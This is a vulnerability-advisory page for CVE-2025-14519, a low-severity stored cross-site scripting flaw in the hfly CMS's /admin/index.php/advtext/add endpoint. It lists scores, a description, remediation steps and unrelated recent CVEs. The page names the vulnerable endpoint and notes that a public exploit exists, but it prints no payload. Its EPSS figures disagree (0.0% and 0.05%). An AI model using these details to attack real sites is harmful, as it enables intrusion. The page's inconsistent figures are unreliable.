Is there a public PoC exploit available for CVE-2025-14519?

Yes, a public proof-of-concept exploit is available for CVE-2025-14519. Prioritise patching immediately. EPSS: 0.0%.

baowzh hfly CVE-2025-14519

Q: What is the CVSS score of CVE-2025-14519?

CVE-2025-14519 has a CVSS 4.0 base score of 2.0 (Low). CVSS vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X. EPSS exploitation probability: 0.0%.

LOW

Cross-site Scripting (XSS) (CWE-79)

2025-12-11 cna@vuldb.com

PHP XSS Hfly

2.0

CVSS 4.0 · NVD

Severity by source

NVD PRIMARY

2.0 LOW

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

Scope

Lifecycle Timeline

Analysis Generated

Apr 29, 2026 - 02:34 vuln.today

DescriptionCVE.org

A security flaw has been discovered in baowzh hfly up to 638ff9abe9078bc977c132b37acbe1900b63491c. This issue affects some unknown processing of the file /admin/index.php/advtext/add of the component advtext Module. The manipulation results in cross site scripting. The attack can be executed remotely. The exploit has been released to the public and may be exploited. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way.

AnalysisAI

Stored cross-site scripting (XSS) in baowzh hfly up to commit 638ff9abe9078bc977c132b37acbe1900b63491c allows authenticated users with user interaction to inject malicious scripts via the /admin/index.php/advtext/add endpoint in the advtext module. Public exploit code is available, and the vulnerability carries a low CVSS score of 2.0 due to authentication and user-interaction requirements, but the EPSS score of 0.05% indicates minimal real-world exploitation probability despite public availability of proof-of-concept code.

Technical ContextAI

The vulnerability exists in the advtext module's add functionality, specifically in the /admin/index.php/advtext/add file processing. This is a stored XSS vulnerability (CWE-79) in a PHP-based travel website CMS, indicating that user-supplied input is not properly sanitized before being stored in the database or reflected in subsequent responses. The attack leverages the web application's failure to validate and encode untrusted data in the advtext add feature, allowing malicious JavaScript to be persisted and executed in the browsers of other users or administrators who view the affected content. The CPE designation (cpe:2.3:a:baowzh:hfly:*:*:*:*:*:*:*:*) indicates all versions of hfly are potentially affected, though the specific commit hash suggests the vulnerability existed at least up to version 638ff9abe9078bc977c132b37acbe1900b63491c.

RemediationAI

No vendor-released patch has been identified at time of analysis, as baowzh did not respond to early disclosure. Organizations using hfly should immediately upgrade to the latest available commit from the official repository if a fix has been released post-disclosure; check the project's Git history for commits after 638ff9abe9078bc977c132b37acbe1900b63491c addressing XSS in the advtext module. As interim compensating controls, disable or restrict access to the /admin/index.php/advtext/add endpoint via web application firewall (WAF) rules or network access controls, limit advtext module access to highly trusted administrators only, and implement input validation and HTML entity encoding for all advtext submissions to prevent script injection. Additionally, deploy a WAF with XSS detection signatures to filter malicious payloads in POST/GET requests to the advtext add handler. Monitor application logs for suspicious submissions containing script tags or JavaScript event handlers. These mitigations reduce exposure but do not fully resolve the vulnerability without a vendor patch.

More from same product – last 7 days

CVE-2026-49952 CRITICAL Act Now POC

9.3 Jun 15

Authentication bypass in Discuz! X5.0 releases 20260320 through 20260501 allows unauthenticated remote attackers to acce

CVE-2026-49954 HIGH This Week POC

8.6 Jun 15

Authenticated remote code execution in Discuz! X5.0 releases 20260320 through 20260501 allows administrators to chain a

CVE-2026-49768 CRITICAL Act Now

9.8 Jun 15

Unauthenticated PHP Object Injection in the Happyforms WordPress plugin (versions <= 1.26.13) allows remote attackers to

CVE-2026-27053 CRITICAL Act Now

9.8 Jun 15

Unauthenticated PHP Object Injection in the Broadcast Live Video WordPress plugin (versions prior to 7.1.3) allows remot

CVE-2026-49104 CRITICAL Act Now

9.8 Jun 15

Unauthenticated PHP object injection in the WordPress plugin 'Integration for Keap/Infusionsoft and Contact Form 7, WPFo

CVE-2025-14519 vulnerability details – vuln.today

Back

baowzh hfly CVE-2025-14519

Severity by source

CVSS VectorNVD

Lifecycle Timeline

DescriptionCVE.org

AnalysisAI

Technical ContextAI

RemediationAI

More from same product – last 7 days

Share

External POC / Exploit Code